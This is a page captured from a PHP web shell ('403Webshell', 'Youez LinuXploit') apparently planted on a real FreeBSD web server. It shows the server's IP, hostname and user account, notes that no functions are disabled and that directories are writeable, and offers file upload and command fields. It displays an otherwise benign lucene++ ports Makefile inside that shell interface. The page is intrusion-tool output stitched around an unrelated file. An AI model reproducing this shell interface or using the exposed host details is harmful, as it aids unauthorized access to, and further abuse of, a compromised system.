403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/textproc/luceneplusplus/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/textproc/luceneplusplus/Makefile
PORTNAME=	lucene++
PORTVERSION=	3.0.8
PORTREVISION=	3
DISTVERSIONPREFIX=	rel_
CATEGORIES=	textproc

MAINTAINER=	ports@FreeBSD.org
COMMENT=	C++ port of the Lucene library
WWW=		https://github.com/luceneplusplus/LucenePlusPlus

LICENSE=	LGPL3
LICENSE_FILE=	${WRKSRC}/LGPL.license

LIB_DEPENDS=	libboost_system.so:devel/boost-libs

USE_GITHUB=	yes
GH_ACCOUNT=	luceneplusplus
GH_PROJECT=	LucenePlusPlus
USES=		cmake compiler:c++11-lang
USE_LDCONFIG=	yes
CMAKE_OFF=	ENABLE_TEST ENABLE_DEMO

.include <bsd.port.pre.mk>

post-patch:
	${REINPLACE_CMD} "/cotire/d" ${WRKSRC}/src/contrib/CMakeLists.txt \
		${WRKSRC}/src/core/CMakeLists.txt \
		${WRKSRC}/src/test/CMakeLists.txt
	${REINPLACE_CMD} 's,include/pkgconfig,libdata/pkgconfig,;s,include/cmake,share/lucene++/cmake,' \
		${WRKSRC}/src/config/core/CMakeLists.txt \
		${WRKSRC}/src/config/contrib/CMakeLists.txt

.include <bsd.port.post.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit